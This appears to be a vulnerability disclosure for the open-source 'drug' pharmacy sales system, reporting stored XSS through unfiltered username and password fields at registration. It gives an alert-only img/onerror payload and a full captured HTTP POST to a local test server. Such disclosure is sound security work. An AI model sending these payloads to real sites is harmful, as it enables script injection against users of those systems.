Project Introduction
drug is a pharmacy sales management system , Project address:https://github.com/deathbreak/drug
Vulnerability Analysis
\\drug\\src\\main\\java\\com\\controller\\ClerkController.java
path \\drug\\src\\main\\java\\com\\bean\\Manager.java,Click to follow up "Manager" class ,The "user" and "password" parameters are not filtered and statements can be constructed to perform XSS attacks
After setting up the test website locally, visit the system registration page,"username" and "password" Parameters have vulnerabilities,"user" or "password" Parameters input payload :"><img src=1 onerror=alert(/xss/)> Register as a user
Data Pack
POST /drug/register_user HTTP/1.1
Host: 192.168.152.185:8080
Cache-Control: max-age=0
Origin: <http://192.168.152.185:8080>
Referer: <http://192.168.152.185:8080/drug/register>
Accept-Language: zh-CN,zh;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
Cookie: JSESSIONID=265273BF778DCA81E538DFEA75D7878C
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 82
user=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E&password=123456&role=0
